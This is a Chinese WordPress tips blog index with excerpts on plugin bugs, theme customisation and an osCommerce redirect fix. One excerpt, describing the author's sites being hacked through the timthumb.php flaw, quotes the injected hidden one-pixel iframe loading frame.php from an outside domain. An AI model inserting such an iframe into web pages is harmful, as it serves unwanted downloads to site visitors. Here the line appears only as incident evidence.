WP笔记

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

继续阅读timthumb漏洞导致iframe攻击,wp-settings.php被修改
WP笔记

WP eStore移植后数据全部丢失

今天折腾的WP网站装了个收费的ecommerce插件,叫WP eStore,说实话感觉这个插件并不比免费的强大多少,还是很多人买。按照移植WordPress的方法折腾完,看起来很不错一切都没问题,访问到Store页面的时候,问题来了,eStore的shortcode报错,说指定的id不存在咋回事。

继续阅读WP eStore移植后数据全部丢失
WP笔记

jquery autocomplete实例:国家选择器

Jquery Autocomplete Plugin 可以用来自动填写表单,类似google suggest,可以给用户更好的体验。

你可以先查看实例

例如,很多表单要求我们填写国家,如果是下拉列表,我们需要从长长的一个列表中选择自己的国家,为了不看的眼花缭乱,我们会用键盘的导航键快速选择,例如要选择中国我们可以选中下拉列表按键盘的“C”键,找到以c开头的国家再找到China。这样还是不够简单迅速。那么来看看下面这个输入式国家选择器,是不是会方便很多。

用户不需要从长长的列表中选择国家了,只需要键入国家的英文名称开头几个字母,这个选择器就会自动提供可供选择的项目,类似google suggest,帮助用户轻轻松松完成国家的选择。

另外,用户完成选择后可以定义一个回调函数,实现更多的功能。例如,选择国家后显示该国家的货币和汇率,或者显示某些房地产信息之类的。可以做的应用很多。

该功能主要依靠JQuery的Autocomplete插件来完成。

[download id=”10″]

继续阅读jquery autocomplete实例:国家选择器
WP笔记

移除Magpress主题的footer链接看wordpress免费主题安全性

最近发现一个主题网站叫mapgress.com,主题功能很不错,无论是前台外观还是后台功能都不输给收费主题,应客户的要求拿来三个主题开始做定制化。开始做的时候就发现了,这个网站主题的footer代码不可以更改!无论是删除全部链接,还是添加自己的链接都不行!

继续阅读移除Magpress主题的footer链接看wordpress免费主题安全性
WP笔记

cufon字体IE浏览器兼容性问题

cufon字体可以让我们在网页上使用自定义的字体,实现和图片一样的效果。cufon字体的使用可以参考文章Cufon-网页设计师必备字体效果

通常情况下,cufon只支持使用简单的标签,你不能使用一些级联选择器,例如#menu ul li等等。经过测试发现,firefox和chrome都支持这种选择方式,但IE不支持。最简单的方法就是引入一个选择器引擎来帮助我们实现这个功能,例如jQuery,这样js引用情况如下:

继续阅读cufon字体IE浏览器兼容性问题
WP笔记

Wordpress CKEditor smiley表情图标定制化

Wordpress默认的编辑器不是很好用,我习惯将它替换成CKEditor,安装CKEditor For WordPress即可。安装后编辑器将被替换,评论框的编辑器默认会被替换成CKEditor,有时候会导致模板样式错乱,可以在CKEditor->Basic Settings中禁用。

定制表情的方法

CKEditor默认的smiley表情不适合中国,我们可以将表情改造一下换成自己喜欢的表情,方法如下。

继续阅读Wordpress CKEditor smiley表情图标定制化
WP笔记

oscommerce 登陆后跳转的问题

Oscomerce登陆后应该跳转到哪里可以分两种情况,

1. 购物车没有商品,跳转到首页或者查看账户页面。

2. 购物车有商品,跳转到购物车页面或者到checkout页面。

代码可以在网店根目录的login.php中修改,打开该文件,找到

tep_redirect(tep_href_link(FILENAME_DEFAULT));

修改为

if ($cart->count_contents() < 1) {
       tep_redirect(tep_href_link('account.php'));
} else {
      tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));
}

代码含义如下

tep_redirect(tep_href_link('account.php')); – 跳转到账户页面,如果要跳转到首页,改为
tep_redirect(tep_href_link(FILENAME_DEFAULT))

 tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));  – 跳转到结账页面,如果要挑战到购物车页面,改为
 tep_redirect(tep_href_link(FILENAME_SHOPPING_CART, '', 'SSL'))

 

继续阅读oscommerce 登陆后跳转的问题
WP笔记

为wp featured content slider plugin添加pager功能

1. wp featured content slider 插件简单介绍

wp featured content slider是一款wordpress的幻灯片(slideshow)插件,你可以在post的编辑页面将post指定为featured post,这样它就可以在featured content slider中显示。该插件的特色是图片(post中的图片或通过custom field定义的图片)显示在banner右侧,post文字内容显示在左侧,是名副其实的content slider。另外该插件提供功能选项,使你可以自由切换幻灯片效果、切换速度、背景色。幻灯片带有箭头是导航按钮。效果图如下

继续阅读为wp featured content slider plugin添加pager功能
WP笔记

wordpress Shopp Title优化

Wordpress Shopp插件使用了wordpress的一个页面来动态输出网店内容,默认的Title带着SHOP这个词,感觉很多余,所以要想办法去掉。

去掉的方法就是在模板的functions.php文件中添加钩子函数修改Title输出,因为其它的SEO插件可以覆盖掉PAGE Title的格式,所以要保证Wordpress Shopp使用的页面title规则不被其它SEO插件控制。

修改方法如下,打开functions.php,在最后添加如下代码

继续阅读wordpress Shopp Title优化
WP笔记

wp-e-commerce后台缩略图不显示

移植wordpress+w-e-commerce的网站要注意wp-e-commerce的路径,在移植wordpress时,我们一般会做两件事:

1.导入文件,修改文件夹权限,修改配置文件等等。

2. 将保存好的数据库用记事本打开,搜索原来的域名,假设是在本地,我们会搜索类似"localhost/wordpress"并替换为目标地址域名www.mydomain.com。

如果我们忽略了搜索绝对地址,可能问题就要出现了。对于wp-e-commerce需要获取上传地址,如果地址不存在,就会发生缩略图不显示的情况,并且后台显示报错信息

The following directories are not writable:

继续阅读wp-e-commerce后台缩略图不显示
WP笔记

wp-e-commerce重复产品(duplicated pruducts) bug

wp-e-commerce(Version 3.7.6.9)有个很奇怪的问题,使用[productsall]列出所有产品条目,会出现很多重复记录,有的重复两次,有的重复四五次。在论坛找解决方法,有人提出将重复产品复制一次,再删除原来的产品,就可以解决。但重复产品太多了,这样做很慢,而且这不是治本的方法。于是我决定找到问题的症结所在。

继续阅读wp-e-commerce重复产品(duplicated pruducts) bug